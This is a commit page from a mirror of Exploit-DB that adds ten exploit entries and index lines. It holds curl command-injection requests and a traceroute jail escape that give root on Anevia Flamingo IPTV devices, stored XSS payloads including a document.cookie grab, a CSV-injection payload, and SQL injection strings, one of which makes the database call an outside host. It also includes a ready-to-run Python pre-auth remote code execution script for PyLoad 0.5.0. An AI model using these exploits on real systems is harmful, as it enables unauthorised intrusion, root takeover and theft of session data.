bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-06-15

Browse source 
11 changes to exploits/shellcodes/ghdb

Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)

Online Thesis Archiving System v1.0 - Multiple-SQLi

projectSend r1605 - CSV injection

projectSend r1605 - Stored XSS

Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2023-06-15 00:16:23 +00:00
parent ea8922f91d
commit 158fcdfd5c
11 changed files with 794 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
exploits/hardware/remote/51514.txt Normal file
View file

@ -0,0 +1,60 @@
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
Hardware revision: 1.1
SoapLive 2.4.0
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.14.29 (x86_64)
Apache/2.2.22 (Debian)
PHP/5.6.0-0anevia2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
13.04.2023
--
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
<td>uid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
---
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

99
exploits/hardware/remote/51515.txt Normal file
View file

@ -0,0 +1,99 @@
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
Hardware revision 1.1, 1.0
SoapLive 2.4.1, 2.0.3
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
13.04.2023
--
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<
100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
* Connection #0 to host 192.168.1.1 left intact

198
exploits/hardware/remote/51516.txt Normal file
View file

@ -0,0 +1,198 @@
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
Hardware revision 1.0
SoapLive 2.0.3
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
13.04.2023
--
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]
trace the route ip packets follow going to "host"
Options:
-F Set the don't fragment bit
-I Use ICMP ECHO instead of UDP datagrams
-l Display the ttl value of the returned packet
-d Set SO_DEBUG options to socket
-n Print hop addresses numerically rather than symbolically
-r Bypass the normal routing tables and send directly to a host
-v Verbose output
-m max_ttl Set the max time-to-live (max number of hops)
-p port# Set the base UDP port number used in probes
(default is 33434)
-q nqueries Set the number of probes per ``ttl'' to nqueries
(default is 3)
-s src_addr Use the following IP address as the source address
-t tos Set the type-of-service in probe packets to the following value
(default 0)
-w wait Set the time (in seconds) to wait for a response to a probe
(default 3 sec)
-g Specify a loose source route gateway (8 maximum)
uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x 19 root root 1024 Oct 3 2022 .
drwxr-xr-x 19 root root 1024 Oct 3 2022 ..
drwxr-xr-x 2 root root 1024 Oct 21 2013 bin
drwxrwxrwt 2 root root 40 Oct 3 2022 cores
drwxr-xr-x 13 root root 27648 May 22 00:53 dev
drwxr-xr-x 3 root root 1024 Oct 21 2013 emul
drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc
drwxr-xr-x 3 root root 1024 Oct 3 2022 home
drwxr-xr-x 11 root root 3072 Oct 21 2013 lib
lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib
drwx------ 2 root root 12288 Oct 21 2013 lost+found
drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt
drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions
dr-xr-xr-x 177 root root 0 Oct 3 2022 proc
drwxr-xr-x 4 root root 1024 Oct 21 2013 root
drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin
drwxr-xr-x 12 root root 0 Oct 3 2022 sys
drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr
drwxr-xr-x 14 root root 1024 Oct 21 2013 var
ls /var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php template
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pear upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php receive_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php include rescrambling.php webtv
check_state input.php resilience webtv.php
class js resilience.php xmltv.php
common license.php restart_service.php
config_snmp.php log.php set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21 2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding firewall mail timezone
config help passwd traceroute
date hostname persistent_logs upgrade
dbg-serial http ping uptime
dbg-set-oem igmpq route version
dbg-updates-log imp serial vlanconfig
dns ipconfig settings
ethconfig license sslconfig
exp log tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]

19
exploits/php/webapps/51517.txt Normal file
View file

@ -0,0 +1,19 @@
Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as =calc|a!z|
step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )
payload: =calc|a!z|

46
exploits/php/webapps/51518.txt Normal file
View file

@ -0,0 +1,46 @@
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs: Stored Xss
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as alert("xss"); and set public
5. And Save
6. Go to http://localhost (logout)
payload: alert("xss")
POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close
csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

17
exploits/php/webapps/51519.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra
--- Description ---
1) Login admin panel and go to Pages:
https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
2) Click edit button and write your payload in the Name field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
https://demos3.softaculous.com/Monstraggybvrnbr4/

17
exploits/php/webapps/51520.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops
--- Description ---
1) Login admin panel and click Image Manager , choose Add Category :
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2

79
exploits/php/webapps/51521.txt Normal file
View file

@ -0,0 +1,79 @@
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain. The application interacted with that domain, indicating that
the injected SQL query was executed. The attacker can dump all
information from the
database of this system, and then he can use it for dangerous and
malicious purposes!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
OR NOT 1404=1404-- Eotr
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
## Time spend:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

196
exploits/php/webapps/51523.txt Normal file
View file

@ -0,0 +1,196 @@
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/
--- Description ---
1) Login admin page , choose Content , Articles section :
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button
https://release-demo.textpattern.co/index.php?id=2
--- Request ---
POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"
2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"
article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"
edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"
"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"
1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"
1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"
4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"
articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"
article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"
2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"
06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"
13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"
19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"
35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"
25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"
alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"
Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"
async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"
fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--

53
exploits/python/webapps/51522.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()
def doRequest(url):
try:
res = requests.get(url)
if res.status_code == 200:
return True
else:
return False
except requests.exceptions.RequestException as e:
print("[!] Maybe the host is offline :", e)
exit()
def runExploit(url, cmd):
endpoint = url + '/flash/addcrypted2'
if " " in cmd:
validCommand = cmd.replace(" ", "%20")
else:
validCommand = cmd
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
print('[+] The exploit has be executeded in target machine. ')
def main(targetUrl, Command):
print('[+] Check if target host is alive: ' + targetUrl)
alive = doRequest(targetUrl)
if alive == True:
print("[+] Host up, let's exploit! ")
runExploit(targetUrl,Command)
else:
print('[-] Host down! ')
if(arguments.url != None and arguments.cmd != None):
targetUrl = arguments.url
Command = arguments.cmd
main(targetUrl, Command)

10
files_exploits.csv
View file

@ -3311,6 +3311,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware,,2013-01-03,2016-12-04,0,OSVDB-88921,,,,,
21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware,,2001-12-20,2012-09-11,1,CVE-2002-0209;OSVDB-3964,,,,,https://www.securityfocus.com/bid/3964/info
31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware,,2014-02-07,2014-02-07,1,CVE-2013-4710;OSVDB-97520,"Metasploit Framework (MSF)",,,,https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview
51516,exploits/hardware/remote/51516.txt,"Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
51515,exploits/hardware/remote/51515.txt,"Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
51514,exploits/hardware/remote/51514.txt,"Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
@ -23467,6 +23470,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80,2015-09-11,2015-09-11,0,OSVDB-127474;OSVDB-127473,,,,http://www.exploit-db.comMonsta-FTP-master.zip,
27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1781;OSVDB-24650,,,,,https://www.securityfocus.com/bid/17546/info
3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php,,2007-03-19,2016-09-29,1,CVE-2006-1781,,,,,
51519,exploits/php/webapps/51519.txt,"Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,,2013-09-20,2018-03-01,1,OSVDB-97526,,,,,https://www.securityfocus.com/bid/62572/info
37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,,2012-08-23,2018-03-01,1,OSVDB-84839,,,,,https://www.securityfocus.com/bid/55171/info
